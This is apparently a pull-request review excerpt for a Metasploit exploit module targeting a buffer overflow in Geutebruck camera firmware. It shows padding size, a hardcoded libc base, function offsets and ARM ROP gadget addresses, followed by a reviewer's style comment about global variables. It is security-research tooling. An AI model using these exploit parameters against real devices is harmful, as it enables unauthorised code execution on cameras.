modules/exploits/linux/http/geutebruck_instantrec_bof.rb

```diff
@@ -0,0 +1,170 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+PAD_SIZE=536
+
+$padding = "a" * PAD_SIZE
+
+$libc_add = 0x402da000
+
+$system_off = 0x00357fc
+$puts_off = 0x0005bc5c
+$exit_off = 0x0002d784
+$sleep_off = 0x0009538c
+$putchar_off = 0x005e608
+
+
+$libc_data_off = 0x12c960
+
+$str_r1_off = 0x0006781c #str r0 into r4 + 0x14; pop r4 pc;                                               
+$pop_r0_off = 0x00101de4 #pop r0 pc                                                                       
+$pop_r1_off = 0x0010252c #pop r1 pc                                                                       
+$pop_r4_off = 0x00015164 #pop r4 pc                                                                       
+
+
+$system = $libc_add + $system_off
+$puts   = $libc_add + $puts_off
+$exit_  = $libc_add + $exit_off
+$sleep_  = $libc_add + $sleep_off
+$putchar  = $libc_add + $putchar_off
+
+
+$str_r1 = $libc_add + $str_r1_off
+$pop_r0 = $libc_add + $pop_r0_off
+$pop_r1 = $libc_add + $pop_r1_off
+$pop_r4 = $libc_add + $pop_r4_off
+
+$add_str = $libc_data_off + $libc_add + 4
```

Comment:
Please don't use globals.

These should be defined in a method or within a `target`.

If you modified `write_string` to return the rop chain then these cal all be moved into that method.